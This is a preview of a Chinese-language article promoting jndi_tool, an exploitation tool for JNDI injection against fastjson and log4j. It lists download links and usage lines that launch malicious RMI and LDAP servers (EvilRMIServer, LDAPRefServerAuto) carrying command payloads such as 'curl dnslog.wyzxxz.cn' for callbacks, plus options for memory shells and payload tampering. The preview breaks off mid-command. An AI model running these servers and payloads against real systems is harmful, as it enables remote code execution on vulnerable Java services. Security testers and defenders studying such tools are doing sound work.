文章预览
01 工具介绍 JNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具 02 工具使用及下载 工具下载 download_url : https: //share.feijipan.com/s/RDAurTUL https: //github.com/wyzxxz/jndi_tool 工具使用 > java -jar jndi_tool.jar Usage: jndi_http: java -cp jndi_tool.jar jndi.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp jndi_tool.jar jndi.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" rmi_high_jdk: java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 "curl dnslog.wyzxxz.cn" el-win/el-linux/groovy ldap_normal: java -cp jndi_tool.jar jndi.LDAPRefServer 1099 host=127.0.0.1 ldap_auto: java -cp jndi_tool.jar jndi.LDAPRefServerAuto 127.0.0.1 1099 80 file=filename (param_format: __JNDI__) fastjson: java -cp jndi_tool.jar jndi.fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex chunk=on java -cp jndi_tool.jar jndi.fastj
………………………………